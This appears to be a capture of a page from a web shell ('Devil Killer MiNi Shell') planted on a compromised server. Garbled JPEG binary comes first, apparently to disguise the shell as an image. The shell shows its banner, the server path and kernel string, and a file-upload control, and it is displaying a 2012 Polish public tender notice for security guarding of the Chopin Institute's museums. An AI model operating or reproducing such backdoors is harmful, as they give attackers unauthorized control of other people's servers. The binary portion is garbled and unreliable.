JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120425/133312-N-2012.html

<p class="kh_header"><b>Warszawa: Ochrona obiektów będących w posiadaniu Narodowego Instytutu Fryderyka Chopina w Warszawie i poza Warszawą</b><br>
<b>Numer ogłoszenia: 133312 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Instytut Fryderyka Chopina , ul. Tamka 43, 00-355 Warszawa, woj. mazowieckie, tel. 22 44 16 100, faks 22 44 16 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chopin.nifc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektów będących w posiadaniu Narodowego Instytutu Fryderyka Chopina w Warszawie i poza Warszawą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony osób i mienia Zamawiającego realizowane w formach określonych w art. 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami): 
- bezpośredniej ochrony fizycznej stałej lub doraźnej, polegającej również na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- a także w formach zabezpieczenia technicznego niezbędnych dla zapewnienia właściwego wykonywania ochrony, uzgodnionych z Zamawiającym. 
1.2.1. Niniejsze postępowanie prowadzone jest w celu udzielenia zamówienia        na następujące 2 (dwie) części tego zamówienia:
Część I - ochrona wykonywana w 2 (dwóch) odrębnych obiektach położonych  w Śródmieściu Warszawy:
a) Muzeum Fryderyka Chopina przy ul. Okólnik 1 wraz z punktem informacji turystycznej i kasą Muzeum oraz łącznikiem pod dziedzińcem Zamku Ostrogskich (dalej w treści SIWZ nazywane jako Muzeum Fryderyka Chopina w Warszawie),
b) Centrum Chopinowskie przy ul. Tamka 43.
Część II -   ochrona wykonywana w 2 (dwóch) odrębnych obiektach położonych poza Warszawą:
a) Dom Urodzenia Fryderyka Chopina w Żelazowej Woli
b) Zespół Dworsko-Parkowy w Brochowie

1.2.2. Wykonawcy mogą składać oferty na wykonanie jednej tylko lub dwóch części z wymienionych powyżej części zamówienia.
1.2.3.   W zakres ochrony wchodzą: usługi stałe oraz usługi doraźne wykonywane w okresie od dnia 30 maja 2012 r. od godziny 9.00 do dnia 30 maja 2013 r. do godziny 9.00. W przypadku zawarcia umowy o wykonanie zamówienia w terminie późniejszym niż od 30 maja 2012 r. Strony zawrą tę umowę na okres pełnych 12 miesięcy, a daty rozpoczęcia i zakończenia świadczenia usługi ochrony ulegną odpowiednio przesunięciu, z wyjątkiem daty rozpoczęcia i daty zakończenia sezonu letniego dla muzeów.
   Przez ochronę, stanowiącą przedmiot zamówienia, należy rozumieć podjęcie stałej, należytej i profesjonalnej działalności mającej na celu zapewnienie bezpieczeństwa osób przebywających w ochranianych obiektach, mienia, zapobieganie przestępstwom i wykroczeniom przeciwko mieniu, likwidowanie zagrożeń związanych z pojawieniem się w ochranianych obiektach (Park w Żelazowej Woli i w Brochowie) dzikich zwierząt, a także przeciwdziałanie powstawaniu szkód wynikających z tych zdarzeń oraz niedopuszczanie do wstępu i przebywania osób nieuprawnionych w obiektach będących przedmiotem ochrony.
   Ochroną stałą całodobową (24 godziny w ciągu doby) objęte będą: Muzeum Fryderyka Chopina przy ul. Okólnik 1 w Warszawie wraz z łącznikiem magazynowym pod Dziedzińcem Zamku Ostrogskich, Centrum Chopinowskie przy ul. Tamka 43      w Warszawie, Dom Urodzenia Fryderyka Chopina w Żelazowej Woli i Zespół          Dworsko-Parkowy w  Brochowie.  
   Dodatkową ochroną w zwiększonym składzie osobowym w godzinach otwarcia muzeów objęte będzie: Muzeum Fryderyka Chopina przy ul. Okólnik 1 w Warszawie i Dom Urodzenia Fryderyka Chopina w Żelazowej Woli, a także Centrum Chopinowskie w godzinach pracy Biura Instytutu. Szacunkową liczbę godzin ochrony dla każdego  z obiektów objętych ochroną zamieszczono w SIWZ w opisie zadań objętych zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamówienia udzielane w trybie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych do wykonania takich samych czynności jak główny przedmiot postępowania, w ilości nie większej niż 20 % wartości zamówienia podstawowego. Zamówienia udzielane w przypadku imprez lub wydarzeń, których zamawiający nie jest w stanie określić szczegółowo w tej chwili, wymagających dodatkowej ochrony na obszarze parku w Żelazowej Woli lub na tarasie i terenie Muzeum w Warszawie  ze względu na rangę (np. międzynarodową, rządową) imprezy, kiedy należy uzupełnić składy ochroniarskie lub zaangażować dla zwiększenia bezpieczeństwa nowe zespoły lub ochrona poszerzona np. ze względu na udostępnianie publiczności szczególnie chronionego okazu muzealnego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 92.52.12.00-1, 92.52.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Obowiązuje wniesienie wadium dla każdej części zamówienia odrębnie:
dla części I - 7.500,00 zł
dla części II - 7.400,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>odpowiednie uprawnienia do prowadzenia działalności gospodarczej w zakresie usług ochrony osób i mienia - t.j. otrzymał koncesję określającą zakres i formy prowadzenia tych usług, o których mowa w art. 15 w związku z art. 5 ust. 2 pkt    4 c i art. 5 ust. 5 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.jedn. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami), a także koncesję w zakresie zabezpieczenia technicznego, uprawniającego do wykonywania czynności opisanych w art. 3 pkt 2 cyt. powyżej ustawy (muzea ustawowo podlegają obowiązkowej ochronie) oraz prowadzi działalność z zakresu objętego niniejszym zamówieniem od minimum 5 lat nieprzerwanie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wiedza i doświadczenie w zakresie niezbędnym  do prawidłowego wykonania przedmiotu zamówienia lub Wykonawca udowodni Zamawiającemu, że będzie dysponować zasobami niezbędnymi do realizacji zamówienia - w trybie art. 26 ust. 2b ustawy Pzp - polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zamawiający zwraca uwagę, że w przypadku skorzystania z uprawnień zapisanych w art. 26 ust. 2 b ustawy Prawo zamówień publicznych Wykonawca składający ofertę będzie zobowiązany do udowodnienia, że podmioty, na których wiedzy  i doświadczeniu będzie polegać przy realizacji zamówienia, posiadają uprawnienia, kwalifikacje i inne cechy wymagane od każdego Wykonawcy składającego ofertę.
     Wymagane jest posiadanie przez Wykonawcę wiedzy i doświadczenia w zakresie niezbędnym do prawidłowego wykonania przedmiotu zamówienia, t.j. wykonanie, a w przypadku świadczeń ciągłych lub okresowych również wykonywanie usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający wymaga wykazania wykonania/wykonywania w tym okresie co najmniej łącznie 6 zamówień (odpowiednich w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia dla niniejszego zamówienia według wymagań zapisanych w opisie przedmiotu zamówienia niniejszej SIWZ), w tym co najmniej 2 zamówień zrealizowanych/realizowanych w placówkach muzealnych, w tym także  wykazania co najmniej  2 zamówień o wartości nie mniejszej niż 300.000 zł brutto każde z nich. Wykonawca winien wykazać wykonywanie usług ochrony, tożsamych charakterem z usługami będącymi przedmiotem niniejszego postępowania, obejmujących w pierwszym rzędzie placówki muzealne, a także kulturalne, obiekty zabytkowe i historyczne,         szczególnie te udostępniane do zwiedzania, ze wskazaniem na obiekty objęte ochroną konserwatora zabytków, a w następnej kolejności urzędy, banki, zrealizowanych w ciągu ostatnich 3 lat, jeżeli okres prowadzenia działalności jest krótszy - zrealizowanych w tym okresie, a jeżeli usługa ochrony jest aktualnie realizowana - z podaniem także umownego terminu jej zakończenia.
Ocena spełniania tego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę  wraz z ofertą Wykazu usług - zawierającego: dane podmiotu realizującego zamówienie, a jeśli jest to podmiot realizujący zamówienie inny niż składający ofertę - w związku z art. 26 ust. 2 pkt b ustawy Prawo zamówień publicznych - dane tego podmiotu realizującego, pełne dane teleadresowe podmiotu zlecającego wykonanie wykazywanego zamówienia, z podaniem okresu/dat realizacji wykazywanego zamówienia, jego wartości, przedmiotu zamówienia, potwierdzonych załączonymi do wykazu usług dokumentami stwierdzającymi, że te wymienione w Wykazie usługi zostały wykonane lub są wykonywane należycie. Jeśli Wykonawca składa ofertę na wykonanie części I i części II zamówienia, te same usługi mogą być przedstawione na potwierdzenie posiadania wiedzy i doświadczenia dla obu części zamówienia. 
Sposób oceny: Zamawiający sklasyfikuje Wykonawców spełniających wszystkie warunki udziału w postępowaniu, zgodnie z warunkami określonymi powyżej. W przypadku Wykonawców, którzy wykażą się usługami o podobnych rozmiarach, polegających na  wykonaniu usługi ochrony w takich samych obiektach, o tej samej wartości usługi, o takim samym czasie trwania - o klasyfikacji zadecyduje wykonanie usług ochrony o większej wartości rocznej usługi, ze szczególnym uwzględnieniem usługi ochrony świadczonej w obiektach kulturalnych lub równorzędne kryterium oceny wskazujące na charakter prac w obiektach o szczególnym znaczeniu dla kultury, wykonanych z najwyższą starannością (potwierdzonych listem referencyjnym lub podobnego charakteru dokumentem).     W przypadku, gdy zastosowanie powyższych kryteriów oceny nie będzie wystarczające do rozstrzygającego sklasyfikowania Wykonawców, o kolejności zdecyduje sumarycznie większa ilość zrealizowanych usług w obiektach o charakterze publicznym, z jak największym zakresem usług specjalistycznych, ze szczególnym uwzględnieniem usług zrealizowanych na terenie objętym nadzorem konserwatora zabytków  w wykazanych przez Wykonawcę obiektach w okresie ostatnich trzech lat  (zgodnie z opisem powyżej).  
Dla podmiotów występujących wspólnie brane będą pod uwagę sumaryczne dane uwzględniane przy ocenie, o jakiej mowa powyżej, tak jak dla Wykonawcy ubiegającego się samodzielnie o  udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca dysponuje sprzętem i wyposażeniem niezbędnym do wykonywania ochrony fizycznej przez pracowników ochrony, w tym urządzenia do komunikacji głosowej, sygnalizatory antynapadowe, środki techniczne i chemiczne do obrony bezpośredniej, a także sprzęt do kontroli właściwego wykonywania przez pracowników ochrony ich obowiązków na terenie i w pomieszczeniach objętych ochroną. Listę tych zabezpieczeń i urządzeń kontrolnych wybrany w przetargu Wykonawca przedstawi Zamawiającemu w ciągu 3 dni od dnia objęcia obiektów Zamawiającego ochroną. Wraz z ofertą Wykonawca złoży oświadczenie, że dysponuje sprzętem i wyposażeniem zapewniającym należyte wykonywanie obowiązków ochrony fizycznej i zabezpieczenia technicznego ochranianych obiektów, zapewniających w wystarczającym stopniu bezpieczeństwo ludzi i majątku Zamawiającego - oświadczenie to Wykonawca sporządzi według ustalonego przez siebie wzoru. 
Wykonawca powinien dysponować na terenie Warszawy zmotoryzowanymi patrolami interwencyjnymi w liczbie co najmniej 15 patroli (w odległości zapewniającej dojazd do chronionych obiektów w Warszawie ciągu 10 minut od otrzymania zgłoszenia) oraz patrole takie w rejonie Żelazowej Woli i Brochowa (w odległości zapewniającej dojazd do chronionych obiektów w ciągu 20 minut od otrzymania zgłoszenia). Wykonawca może posiadać podwykonawców w części zamówienia dot. posiadania zmotoryzowanych patroli. Wobec agentów ochrony uczestniczących w zmotoryzowanych patrolach stosuje się wymagania tak jak wobec agentów wykonujących zadania ochrony w obiektach Zamawiającego. Ocena spełniania tego wymogu zostanie dokonana na podstawie Oświadczenia Wykonawcy, złożonego wraz z ofertą, o dysponowaniu zmotoryzowanymi patrolami w ilości opisanej powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca dysponuje odpowiednio wyszkolonym personelem, osób nie karanych, w tym agentami posiadającymi licencję pracownika ochrony fizycznej co najmniej pierwszego stopnia w liczbie niezbędnej do zapewnienia obsady dyżurów w każdym obiekcie i na każdej zmianie z udziałem pracownika posiadającego licencję, a w Muzeum Fryderyka Chopina w Zamku Ostrogskich w Warszawie do zapewnienia pełnej obsady pracowników posiadających licencję na każdej zmianie, z uwzględnieniem dyżurów nie dłuższych niż 12-godzinne, pełnionych w systemie całodobowym w Muzeum Fryderyka Chopina w Warszawie i w Domu Urodzenia Fryderyka Chopina w Żelazowej Woli oraz dyżurów dziennych w wymiarze wynikającym z wyznaczonego czasu pełnienia takiego dyżuru w każdym z obiektów w czasie otwarcia Muzeum Fryderyka Chopina w Warszawie oraz Domu Urodzenia Fryderyka Chopina w Żelazowej Woli. Zamawiający wymaga, aby ze względu na międzynarodowy charakter obiektów muzealnych objętych ochroną co najmniej połowa pracowników ochrony zaangażowanych do realizacji zamówienia ukończyła szkolenie dla pracowników ochrony fizycznej muzeów i innych obiektów  gromadzących publiczne zbiory dóbr kultury, organizowane uprzednio przez Ośrodek Ochrony Zbiorów Publicznych lub inną równoważną instytucję upoważnioną do organizowania szkoleń o takim samym albo podobnym charakterze i zakresie, uznawaną przez jednostki kultury gromadzące narodowe zbiory muzealne (pkt 1.2.7.5. SIWZ). Zamawiający wymaga także, aby co najmniej dwóch pracowników realizujących zamówienie posiadało licencję pracownika zabezpieczenia technicznego, w tym przynajmniej jeden licencję II stopnia, którzy ukończyli kurs dla projektantów i instalatorów systemów zabezpieczających przed przestępczością i pożarem obiekty zabytkowe, muzealne, sakralne i inne gromadzące publiczne zbiory dóbr kultury. W przypadku otrzymania przez tego samego Wykonawcę do realizacji części I i części II zamówienia - w/w pracownicy mogą być wykazani do obu części zamówienia.  Pracownicy skierowani do ochrony w bezpośrednim kontakcie ze zwiedzającymi winni posługiwać się językiem obcym, preferowany język angielski, w stopniu pozwalającym na swobodne porozumiewanie się. Ocena spełniania tego warunku zostanie dokonana na podstawie przedłożonego przez Wykonawcę  wraz z ofertą Wykazu osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi ochrony, kontrolę jakości, wraz z informacją  na temat ich kwalifikacji zawodowych - posiadanych uprawnień do wykonywania usługi ochrony, doświadczenia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.  Wymóg podania informacji  o pracownikach wykonujących usługę ochrony dotyczy w takim samym zakresie osób uczestniczących w ruchomych patrolach, także w przypadku, jeśli tę część usługi realizuje podwykonawca. Wykonawcy złożą wraz z ofertą  Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane (powyżej opisane) uprawnienia do wykonywania usługi ochrony oraz że Wykonawca posiada podstawę do dysponowania tymi osobami przy realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jest ubezpieczony z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełniania tego wymogu zostanie dokonana na podstawie złożonej wraz z ofertą opłaconej polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony w pełnym zakresie od odpowiedzialności cywilnej (OC) w ramach prowadzonej działalności związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 5.000.000 zł (pięć milionów zł) na jedno i na wszystkie zdarzenia, obejmującą okresem ważności czas nie krótszy niż co najmniej 3 (trzy) miesiące realizacji niniejszego zamówienia od dnia podjęcia ochrony, a wyłoniony w postępowaniu Wykonawca zobowiązuje się do przedłużenia polisy OC na cały okres realizacji zamówienia. Jeżeli wniosek składany jest przez podmioty występujące wspólnie (np. konsorcjum), polisa taka powinna zapewniać w pełnym zakresie ubezpieczenie odpowiedzialności cywilnej wszystkich podmiotów wspólnie występujących w tym przedsięwzięciu, w formie, jaką przyjmą wspólnie występujące podmioty, np. polisa OC  wystawiona łącznie na rzecz tych wszystkich podmiotów w wymaganym zakresie lub też polisa OC obejmująca ubezpieczeniem w innej formie ustalonej w umowie wspólnie występujące podmioty, jeżeli zapewni to bezpieczeństwo wykonania zamówienia co najmniej w takim samym stopniu jak polisa OC indywidualnego wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
